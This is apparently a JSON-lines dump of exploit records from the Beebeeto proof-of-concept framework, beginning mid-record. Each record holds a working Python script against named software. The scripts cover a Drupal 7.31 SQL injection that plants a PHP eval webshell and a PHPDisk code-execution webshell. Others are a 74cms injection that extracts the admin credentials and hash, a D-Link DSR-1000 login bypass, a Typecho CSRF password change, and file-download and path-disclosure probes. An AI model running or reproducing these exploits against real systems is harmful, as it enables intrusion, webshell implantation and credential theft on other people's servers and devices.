},\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"3a1c6cc728dddc258091a601f28a9c12\"\r\n verify_url = args['options']['target'] + \"/include/lib/js/uploadify/uploadify.swf\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n md5_value = md5.new(content).hexdigest()\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "emblog include/lib/js/uploadify/uploadify.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002", "app_name": "Emlog", "id": "poc-2014-0103", "layer4_protocol": null}
{"create_date": "2014-10-22 14:24:25", "name": "Typecho 0.9(13.12.12) CSRF\u4fee\u6539\u7ba1\u7406\u5458\u5bc6\u7801\u6f0f\u6d1e Exploit", "level": "\u4f4e\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 2, "port": null, "vul_type": "CSRF", "tag": "Typecho\u6f0f\u6d1e,CSRF\u4fee\u6539\u7ba1\u7406\u5458\u5bc6\u7801\u6f0f\u6d1e,/profile.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0102',\r\n 'name': 'Typecho 0.9(13.12.12) CSRF\u4fee\u6539\u7ba1\u7406\u5458\u5bc6\u7801\u6f0f\u6d1e Exploit',\r\n 'author': '\u96f7\u8702',\r\n 'create_date': '2014-10-22',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Typecho',\r\n 'vul_version': ['0.9'],\r\n 'type': 'Cross Site Request Forgery',\r\n 'tag': ['Typecho\u6f0f\u6d1e', 'CSRF\u4fee\u6539\u7ba1\u7406\u5458\u5bc6\u7801\u6f0f\u6d1e', '/profile.php'],\r\n 'desc': '''\r\n http://typecho/admin/profile.php page, Change password form CSRF vul.\r\n http://typecho/admin/themes.php, We can write the PHP Backdoor in this page.\r\n ''',\r\n 'references': ['http://www.hackersoul.com/typecho/ff0000-hsdb-0002.html',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n verify_url = args['options']['target'] + '/index.php/action/users-profile'\r\n if args['options']['verbose']:\r\n print '[*] Generation: ' + verify_url\r\n temp = '''\r\n <div style=\"display: none;\">\r\n <form action=\"%s\" method=\"post\" name=\"ff0000team\" enctype=\"application/x-www-form-urlencoded\">\r\n <input type=\"hidden\" name=\"password\" 
value=\"beebeeto\"/>\r\n <input type=\"hidden\" name=\"confirm\" value=\"beebeeto\" />\r\n <input name=\"do\" type=\"hidden\" value=\"password\" />\r\n <button type=\"submit\"></button>\r\n </form>\r\n </div>\r\n <script>\r\n setTimeout(\"document.ff0000team.submit()\", 2000);\r\n </script>\r\n ''' % verify_url\r\n print '[*] Copy code: ' + temp\r\n print '[*] Specific use: ' + str(MyPoc.poc_info['vul']['references'])\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = 'Generation ok'\r\n return args\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "http://typecho/admin/profile.php page, Change password form CSRF vul.\r\nhttp://typecho/admin/themes.php, We can write the PHP Backdoor in this page.", "app_name": "Typecho", "id": "poc-2014-0102", "layer4_protocol": null}
{"create_date": "2014-10-21 21:39:38", "name": "Drupal 7.31 GetShell via /includes/database/database.inc SQL Injection Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "Ricter", "rank": 5, "port": null, "vul_type": "\u547d\u4ee4\u6267\u884c", "tag": "Drupal\u6f0f\u6d1e,\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,PHP,GETSHELL", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n# \u6f0f\u6d1e\u5206\u6790\uff1ahttps://www.ricter.me/posts/Drupal%20%E7%9A%84%20callback%20%E5%99%A9%E6%A2%A6\r\n\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0100',\r\n 'name': 'Drupal 7.31 GetShell via /includes/database/database.inc SQL Injection Exploit',\r\n 'author': 'Ricter',\r\n 'create_date': '2014-10-21',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Drupal',\r\n 'vul_version': ['<=7.31'],\r\n 'type': 'Code Execution',\r\n 'tag': ['Drupal\u6f0f\u6d1e', '\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', 'PHP', 'GETSHELL'],\r\n 'desc': '''\r\n Drupal 7.31 /includes/database/database.inc\u5728\u5904\u7406IN\u8bed\u53e5\u65f6\uff0c\u5c55\u5f00\u6570\u7ec4\u65f6key\u5e26\u5165SQL\u8bed\u53e5\u5bfc\u81f4SQL\u6ce8\u5165\uff0c\r\n \u53ef\u4ee5\u6dfb\u52a0\u7ba1\u7406\u5458\u3001\u9020\u6210\u4fe1\u606f\u6cc4\u9732\uff0c\u5229\u7528\u7279\u6027\u4e5f\u53ef getshell\u3002\r\n ''',\r\n 'references': ['https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n url = 
args['options']['target']\r\n webshell_url = url + '/?q=<?php%20eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>'\r\n payload = \"name[0;insert into menu_router (path, page_callback, access_callback, \" \\\r\n \"include_file, load_functions, to_arg_functions, description) values ('<\" \\\r\n \"?php eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>','php_eval', '1', '\" \\\r\n \"modules/php/php.module', '', '', '');#]=test&name[0]=test2&pass=test&fo\" \\\r\n \"rm_id=user_login_block\"\r\n\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + url\r\n print '[*] POST Content: ' + payload\r\n\r\n urllib2.urlopen(url, data=payload)\r\n request = urllib2.Request(webshell_url, data=\"e=echo strrev(gwesdvjvncqwdijqiwdqwduhq);\")\r\n response = urllib2.urlopen(request).read()\r\n\r\n if 'gwesdvjvncqwdijqiwdqwduhq'[::-1] in response:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = url\r\n args['poc_ret']['Webshell'] = webshell_url\r\n args['poc_ret']['Webshell_PWD'] = 'e'\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n verify = exploit\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Drupal 7.31 /includes/database/database.inc\u5728\u5904\u7406IN\u8bed\u53e5\u65f6\uff0c\u5c55\u5f00\u6570\u7ec4\u65f6key\u5e26\u5165SQL\u8bed\u53e5\u5bfc\u81f4SQL\u6ce8\u5165\uff0c\u53ef\u4ee5\u6dfb\u52a0\u7ba1\u7406\u5458\u3001\u9020\u6210\u4fe1\u606f\u6cc4\u9732\uff0c\u5229\u7528\u7279\u6027\u4e5f\u53ef getshell\u3002\r\n# \u6f0f\u6d1e\u5206\u6790\uff1ahttps://www.ricter.me/posts/Drupal%20%E7%9A%84%20callback%20%E5%99%A9%E6%A2%A6", "app_name": "Drupal", "id": "poc-2014-0100", "layer4_protocol": null}
{"create_date": "2014-10-21 16:40:27", "name": "xampp 1.7.3 /xampp/showcode.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "xampp\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/xampp/showcode.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0098',\r\n 'name': 'xampp 1.7.3 /xampp/showcode.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2014-10-21',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'xampp',\r\n 'vul_version': ['1.7.3'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['xampp\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/xampp/showcode.php', 'php'],\r\n 'desc': 'xampp <=1.7.3 has a file disclosure Vul. 
attacker can read any files on web server.',\r\n 'references': ['http://www.exploit-db.com/exploits/15370/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/xampp/showcode.php/c:boot.ini?showcode=1'\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"<textarea cols='100' rows='10'>[boot loader]\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "xampp <=1.7.3 has a file disclosure Vul. attacker can read any files on web server.", "app_name": "XAMPP", "id": "poc-2014-0098", "layer4_protocol": null}
{"create_date": "2014-10-21 16:34:25", "name": "eYou v3 /user/send_queue/listCollege.php \u8def\u5f84\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "eYou\u6f0f\u6d1e,\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e,/listCollege.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0097',\r\n 'name': 'eYou v3 /user/send_queue/listCollege.php \u8def\u5f84\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-10-21',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'eYou',\r\n 'vul_version': ['v3'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['eYou\u6f0f\u6d1e', '\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e', '/listCollege.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://sebug.net/vuldb/ssvid-62693',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/user/send_queue/listCollege.php'\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n res = re.compile(r'supplied argument is not a valid MySQL result resource in <b>(.*)</b> on line')\r\n match = res.findall(content)\r\n if match:\r\n if '<b>Warning</b>:' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return 
args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "eYou", "id": "poc-2014-0097", "layer4_protocol": null}
{"create_date": "2014-10-21 15:59:29", "name": "74cms V3.4 /plus/ajax_officebuilding.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "74cms\u6f0f\u6d1e,SQL\u6ce8\u5165,/plus/ajax_officebuilding.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0093',\r\n 'name': '74cms V3.4 /plus/ajax_officebuilding.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit',\r\n 'author': '\u5927\u5b69\u5c0f\u5b69',\r\n 'create_date': '2014-10-21',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '74cms',\r\n 'vul_version': ['V3.4'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['74cms\u6f0f\u6d1e', 'SQL\u6ce8\u5165', '/plus/ajax_officebuilding.php', 'php'],\r\n 'desc': '74cms V3.4.20140530 /plus/ajax_officebuilding.php\u6587\u4ef6\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e\u3002',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-063225',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/plus/ajax_officebuilding.php?act=key&key=asd%\u9326%27%20uniounionn%20selselectect\"\r\n \"%201,2,3,md5(7836457),5,6,7,8,9%23\")\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n if '3438d5e3ead84b2effc5ec33ed1239f5' in 
content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n vul_url = args['options']['target'] + \"/plus/ajax_officebuilding.php\"\r\n paload1 = (\"?act=key&key=asd%\u9326%27%20uniounionn%20selselectect%201,2,3,admin_name,5,6,7,pwd,9%20from\"\r\n \"%20qs_admin%20LIMIT%201%23\")\r\n paload2 = (\"?act=key&key=asd%\u9326%27%20uniounionn%20selselectect%201,2,3,pwd_hash,5,6,7,8,9%20from%20\"\r\n \"qs_admin%20LIMIT%201%23\")\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + vul_url\r\n request = urllib2.Request(vul_url + paload1)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n pattern = re.compile(r'.*?<a[^>]*?>(?P<username>[^<>]*?)</a><span>(?P<password>[^<>]*?)</span>',re.I|re.S)\r\n match = pattern.match(content)\r\n if match == None:\r\n args['success'] = False\r\n return args\r\n else:\r\n username = match.group('username').strip()\r\n password = match.group('password').strip()\r\n request = urllib2.Request(vul_url + paload2)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n pattern = re.compile(r'.*?<a[^>]*?>(?P<pwdhash>[^<>]*?)</a>',re.I|re.S)\r\n match = pattern.match(content)\r\n if match == None:\r\n args['success'] = False\r\n return args\r\n else:\r\n passwordhash = match.group('pwdhash').strip()\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = vul_url\r\n args['poc_ret']['Username'] = username\r\n args['poc_ret']['Password'] = password\r\n args['poc_ret']['PasswordHash'] = passwordhash\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "74cms V3.4.20140530 /plus/ajax_officebuilding.php\u6587\u4ef6\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e\u3002", "app_name": "74cms", "id": "poc-2014-0093", "layer4_protocol": null}
{"create_date": "2014-10-21 11:16:58", "name": "D-Link DSR-1000 v1.08B77 Authentication Bypass POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "e3rp4y", "rank": 2, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "D-Link\u6f0f\u6d1e,Authentication Bypass,SQL Injection", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http import forgeheaders\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0090',\r\n 'name': 'D-Link DSR-1000 v1.08B77 Authentication Bypass POC',\r\n 'author': 'e3rp4y',\r\n 'create_date': '2014-10-20',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'D-Link',\r\n 'vul_version': ['< Firmware v1.08B77'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['D-Link\u6f0f\u6d1e', 'Authentication Bypass', 'SQL Injection'],\r\n 'desc': 'D-Link DSR-1000\u8ba4\u8bc1SQL\u6ce8\u5165\u6f0f\u6d1e, \u53ef\u514d\u5bc6\u7801\u767b\u5f55\u8def\u7531\u8bbe\u5907',\r\n 'references': ['http://www.exploit-db.com/papers/30061/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n ua = forgeheaders.Linux().randomly_get()\r\n headers = {\r\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Origin': args['options']['target'],\r\n 'Referer': args['options']['target'] + '/',\r\n 'User-Agent': ua}\r\n\r\n url = args['options']['target'] + 'platform.cgi'\r\n resp = requests.post(\r\n url,\r\n headers=headers,\r\n data={'thispage': 'index.htm',\r\n 'Users.UserName': 'admin',\r\n 
'Users.Password': \"' or 'a'='a\",\r\n 'button.login.Users.deviceStatus': 'Login',\r\n 'Login.userAgent': ua})\r\n\r\n if resp.status_code != 200:\r\n args['success'] = False\r\n return args\r\n\r\n if 'title=\"Continue\"' not in resp.text and \\\r\n 'Logout' not in resp.text:\r\n args['success'] = False\r\n return args\r\n\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "D-Link DSR-1000\u8ba4\u8bc1SQL\u6ce8\u5165\u6f0f\u6d1e, \u53ef\u514d\u5bc6\u7801\u767b\u5f55\u8def\u7531\u8bbe\u5907", "app_name": "D-LINK", "id": "poc-2014-0090", "layer4_protocol": null}
{"create_date": "2014-10-21 10:52:24", "name": "JEECMS /download.jspx Arbitrary File Download POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "flsf", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "JEECMS\u6f0f\u6d1e,/download.jspx,Arbitrary File Download", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0088',\r\n 'name': 'JEECMS /download.jspx Arbitrary File Download POC',\r\n 'author': 'flsf',\r\n 'create_date': '2014-10-20',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'JEECMS',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['JEECMS\u6f0f\u6d1e', '/download.jspx', 'Arbitrary File Download'],\r\n 'desc': '/download.jspx \u6587\u4ef6\u7528\u4e8e\u6587\u4ef6\u4e0b\u8f7d,fpath\u53cafilename\u53c2\u6570\u672a\u505a\u6b63\u786e\u8fc7\u6ee4\u9650\u5236,\u5bfc\u81f4\u53ef\u4e0b\u8f7d\u4efb\u610f\u6587\u4ef6',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-077960',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + \"/download.jspx?fpath=WEB-INF/web.xml&filename=WEB-INF/web.xml\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n if 'WEB-INF/config/' in content and 'contextConfigLocation' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return 
args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "/download.jspx \u6587\u4ef6\u7528\u4e8e\u6587\u4ef6\u4e0b\u8f7d,fpath\u53cafilename\u53c2\u6570\u672a\u505a\u6b63\u786e\u8fc7\u6ee4\u9650\u5236,\u5bfc\u81f4\u53ef\u4e0b\u8f7d\u4efb\u610f\u6587\u4ef6", "app_name": "JEECMS", "id": "poc-2014-0088", "layer4_protocol": null}
{"create_date": "2014-10-20 17:49:50", "name": "PHPDisk 2.5 /phpdisk_del_process.php \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "PHPDisk E_Core \u6f0f\u6d1e,\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e,/phpdisk_del_process.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0087',\r\n 'name': 'PHPDisk 2.5 /phpdisk_del_process.php \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit',\r\n 'author': 'foundu',\r\n 'create_date': '2014-10-20',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PHPDisk',\r\n 'vul_version': ['2.5'],\r\n 'type': 'Code Execution',\r\n 'tag': ['PHPDisk E_Core \u6f0f\u6d1e', '\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e', '/phpdisk_del_process.php'],\r\n 'desc': '\u5229\u7528\u73af\u5883\u6bd4\u8f83\u9e21\u808b\uff0c\u4ee3\u7801\u6267\u884c\u9700\u8981\u5173\u95edshort_open_tag',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-057665',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n del_url = args['options']['target'] + '/phpdisk_del_process.php?a'\r\n shell_url = args['options']['target'] + '/system/delfile_log.php'\r\n data = {\r\n 'pp': 'system/install.lock',\r\n 'file_id': '<?php echo md5(233333);?>#',\r\n 'safe': 'a'\r\n }\r\n post_data = urllib.urlencode(data)\r\n request = urllib2.Request(del_url, post_data)\r\n response = urllib2.urlopen(request)\r\n 
shell_request = urllib2.Request(shell_url)\r\n shell_response = urllib2.urlopen(shell_request)\r\n content = shell_response.read()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + del_url\r\n print '[*] Request URL2: ' + shell_url\r\n match = re.search('fb0b32aeafac4591c7ae6d5e58308344', content)\r\n if match:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = shell_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n del_url = args['options']['target'] + '/phpdisk_del_process.php?a'\r\n shell_url = args['options']['target'] + '/system/delfile_log.php'\r\n data = {\r\n 'pp': 'system/install.lock',\r\n 'file_id': '<?php echo md5(233333);eval($_POST[bb2];?>#',\r\n 'safe': 'a'\r\n }\r\n post_data = urllib.urlencode(data)\r\n request = urllib2.Request(del_url, post_data)\r\n response = urllib2.urlopen(request)\r\n shell_request = urllib2.Request(shell_url)\r\n shell_response = urllib2.urlopen(shell_request)\r\n content = shell_response.read()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + del_url\r\n print '[*] Request URL2: ' + shell_url\r\n match = re.search('fb0b32aeafac4591c7ae6d5e58308344', content)\r\n if match:\r\n args['success'] = True\r\n args['poc_ret']['webshell'] = shell_url\r\n args['poc_ret']['content'] = '<?php echo md5(233333);eval($_POST[bb2];?>'\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u5229\u7528\u73af\u5883\u6bd4\u8f83\u9e21\u808b\uff0c\u4ee3\u7801\u6267\u884c\u9700\u8981\u5173\u95edshort_open_tag", "app_name": "PHPDisk", "id": "poc-2014-0087", "layer4_protocol": null}
